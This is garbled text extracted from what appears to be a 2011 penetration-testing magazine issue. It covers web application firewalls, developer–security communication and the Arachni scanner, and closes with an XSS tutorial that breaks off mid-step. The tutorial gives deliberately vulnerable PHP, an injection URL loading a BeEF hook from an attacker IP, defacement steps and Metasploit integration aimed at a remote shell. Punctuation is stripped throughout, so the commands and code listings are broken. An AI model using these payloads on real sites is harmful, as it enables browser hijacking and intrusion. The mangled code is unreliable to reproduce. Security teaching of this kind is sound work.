lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
